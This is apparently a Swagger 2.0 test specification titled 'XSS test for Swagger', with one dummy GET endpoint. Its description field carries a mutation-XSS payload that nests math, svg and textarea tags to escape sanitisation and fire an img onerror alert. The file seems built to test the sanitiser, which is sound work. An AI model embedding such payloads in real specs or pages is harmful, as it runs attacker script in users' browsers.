swagger: '2.0'
info:
  title: XSS test for Swagger
  description: |
        <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /test:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - test
      operationId: findtest
      summary: Finds all tests
